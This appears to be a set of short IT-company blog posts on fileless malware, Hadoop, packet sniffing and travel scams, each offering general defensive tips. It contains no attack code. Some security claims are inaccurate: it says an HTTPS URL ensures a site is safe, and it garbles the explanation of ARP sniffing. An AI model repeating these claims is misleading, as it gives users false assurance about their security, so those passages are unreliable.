What Is Fileless Malware Attack?

Gone are the days when the only way to inject a malware was through malicious files sent in emails. Nowadays, fileless attacks are taking over the toll and are becoming more common. According to The State of Endpoint Security Risk Report by Ponemon Institute, 77% of the total compromised attacks in 2017 were fileless.

Fileless malware attack as the name suggests do not need installation of a malicious software to infect the victim’s machine. It is also known as zero-footprint, non-malware, macro attack etc. as unlike traditional malware it takes advantage of the vulnerabilities existing on the user’s device. It usually exists in the computer’s RAM and uses common system tools such as Windows Management Instrumentation, PowerShell etc. to inject the malware.

Since they are not injected through a file, it is often very difficult to prevent, detect & remove the malware. However, the loss can be minimized to a great extent if you reboot your device as RAM can be exploited only if the device is on.

Features Of Fileless Malware

  • It is difficult for antivirus software’s to detect the malware as it is not based on an identifiable code or signature.
  • It is a memory based malware.
  • It can be paired with other types of malwares as well.
  • Fileless attacks evade whitelisting (the practice by which only approved applications are allowed to be installed on a system).
  • Processes that are native to the operating system are generally used in order to initiate an attack.
  • It generally takes advantage of approved applications that are there on your system.

How Does It Work?
Such an attack maybe launched through a variety of ways. You might mistakenly click on a banner ad that shall redirect you to a legitimate looking malicious site which may load Flash on your system. Flash in turn will compromise the Windows PowerShell. This in turn might download a malicious code from a botnet and send the data to hackers.

How To Detect?

It is usually difficult to detect a fileless malware attack since it is not launched through files. However, there are certain warning signs that one needs to take a note of.

  • Unusual network patterns
  • Compromised memory
  • Unusual snags

Ways To Protect Yourself From Fileless Malware Attack

  • Updating your current software on a regular basis.
  • Keeping a tab on your network traffic.
  • Disabling PDF readers from activating JavaScript
  • Uninstalling or disabling features that you do not use.
  • By enhancing your end point security.
  • Adopting safe practices to use PowerShell.
  • Disabling Flash
  • Employing password vaults & strengthening user authentication.
  • Cognizing employees about the attack in order to combat the threat.

For more information about IT Security, call Centex Technologies at (254) 213-4740.


Benefits of Hadoop

Hadoop is an open source distributed processing framework that is commonly used to process and store big data. Not only does it store but also helps in running applications on clusters of commodity hardware.

Software solutions like Hadoop have become a necessity for businesses that store & use big data due to its ability to store & process massive amounts of data. A classic feature of Hadoop is that it can handle both structured & unstructured data thus providing enhanced flexibility to users.

Reasons To Implement Hadoop

  • Massive Storage – With big data increasing rapidly, there was a need for a software solution that could handle large volumes of data. Hadoop has solved that problem with its ability to hold enormous amount of data. The data is often split into blocks and then stored in clusters.
  • Scalability – You wish to have the ability to handle more data? No problem, with Hadoop you can do that easily and that too without any hassle. With little administration Hadoop allows you to add more nodes easily.
  • Flexibility – Hadoop enables you to store as much data as you want whether it is structured or unstructured, formatted or encoded or in any other form. So apart from text you can store images, videos, etc. Also, with Hadoop you are not required to process data before storing it, thus making it relevant as well as simple to use.
  • Computing – Its computing model helps in processing large amounts of data easily. The arithmetic is simple; more the nodes, more the processing power that you have.
  • Fault Tolerance – Hadoop is fault tolerant i.e. it protects the data in case of any hardware failure. When a node gets lost or goes down, Hadoop framework redirects the task/work to another node to avoid any disruption. Also Hadoop keeps a duplicate copy of data which is then stored in different clusters.
  • More Real Time – It allows you to store information into a cluster and analyze it in real time. It provides a standard approach to numerous API’s for big data analytics.
  • Cost Effective – It uses commodity hardware to store data which leads to reduction in cost per terabyte of storage.

When Not To Use Hadoop?

  • When you wish to modify data
  • There are lots of small files
  • There is low latency data access

For more information about IT Security, call Centex Technologies at (254) 213-4740.

, ,

What Are SQL Injection Attacks & Its Types

PDF Version : What-Are-SQL-Injection-Attacks-&-Its-Types




What Is Packet Sniffing?

Information is often broken into smaller units when it is transmitted over the computer network. These small units known as data packets are fragmented at the sender’s node and are reassembled in their original format at the receiver’s node.

Every data packet has to cross a number of traffic control devices such as routers & switches. However, the data packet is susceptible to the risk of being captured each time it crosses these control devices. This act of collecting data packets illegally by hackers is known as packet sniffing. Hackers often use specialized devices
known as packet sniffers to do so.

How Does A Packet Sniffer Work?
A packet sniffer can exist in the form of software or hardware specifically designed to collect the data being transmitted over the network. They intercept & log network traffic with the help of wired or wireless network interface it has an access to. Hackers might use it to capture:

  • User names
  • Passwords
  • Downloaded files
  • Emails
  • Audio & video activity
  • Other sensitive information

An illegal packet sniffer is installed somewhere on the network without the knowledge of an IT administrator to gain unauthorized access to confidential information. Hackers also use sniffers to eavesdrop on unencrypted data to spy and checkout information being exchanged between the two parties and use it for their benefit.

Types Of Packet Sniffing

There are 3 types of packet sniffing, let us understand how they work:

  • IP Sniffing – It uses the network card to sniff all information packets that correspond with the IP address filter. These information packets are all used for analysis and examination.
  • MAC Sniffing – It also works through a network card and sniffs away the information packets that correspond to MAC address filter.
  • ARP Sniffing – In this type of sniffing, information packets are sent to the administrator through the ARP cache of both network hosts. The traffic is forwarded to the administrator directly instead of sending it to the hosts.

How To Protect Yourself From Packet Sniffing?

  • Use VPN – VPN (Virtual Private Network) connections provide complete privacy and secure your computer’s internet connection. It makes sure that all the data you are sending and receiving is encrypted & secured.
  • Always Check the HTTPS – Make sure that the websites that you visit have an HTTPS in its URL. Having it in the URL ensures that the website is safe to use.
  • Be Cautious – The risk of packet sniffing rises when a device is connected to a public Wi-Fi network. So be highly cautious of the websites you visit when you are on that network. Avoid doing financial transactions, entering sensitive information etc.

Other Ways

  • Scan your network
  • Use the Antisniff tool
  • Log out when you are done

For more information about IT Security, call Centex Technologies at (254) 213-4740.


Ticket & Travel Scams

It often seems easy and convenient to make ticket bookings and hotel reservations online. However one has to be highly cautious while doing so to avoid falling prey to a cyber fraud. Since ticket & travel scams are quite common these days, it is important to be vigilant in order to stay protected from numerous travel websites which are tricking people by selling fake tickets.

Here are some most common ways in which a ticket and travel scam is done:

  • Free Or Discounted Vacation – The victim is often sent an email with a congratulatory message that they have won a vacation travel & stay for free or at a discounted rate but they will be required to pay a small fee or provide their credit card details in order to claim the offer.
  • Vacation Ticket Re-Sell Scam – Sometimes the victim falls prey to an ad posted by someone who claims to have purchased a ticket but wishes to re-sell it due to inability to go for the trip because of some personal reasons. Thus, the victim is fooled by an offer of getting tickets at a much lower fare.
  • Location Scam – Fraudsters post an ad of a vacation rental or hotel and when an interested person clicks on it to make the bookings, they are often asked for some security deposit or sometimes even the full amount. However, all their excitement and zeal to spend a perfect vacation goes off when they reach the booked destination and find that no such place exists and that they have been scammed.

Tips To Avoid The Scam:

  • Be Cautious – Look out for hints while scrolling through a website. Most likely a website that does not have an about and contact page would be a scam site. Also check that the URL has ‘https’ to make sure that it is a secure website.
  • Check Reviews Online – To know if the website is safe to use or not, make sure that you check their social media profiles, reviews, blog posts etc. because it is highly unlikely for a fake website to put in efforts for building up all fake reviews and social media handles.
  • Use A Credit Card – Credit cards are more secure than debit cards as they do not allow direct access to your bank account and are at a better position when it comes to protection from fraudulent activities.

For more information about IT Security, call Centex Technologies at (254) 213-4740.

, ,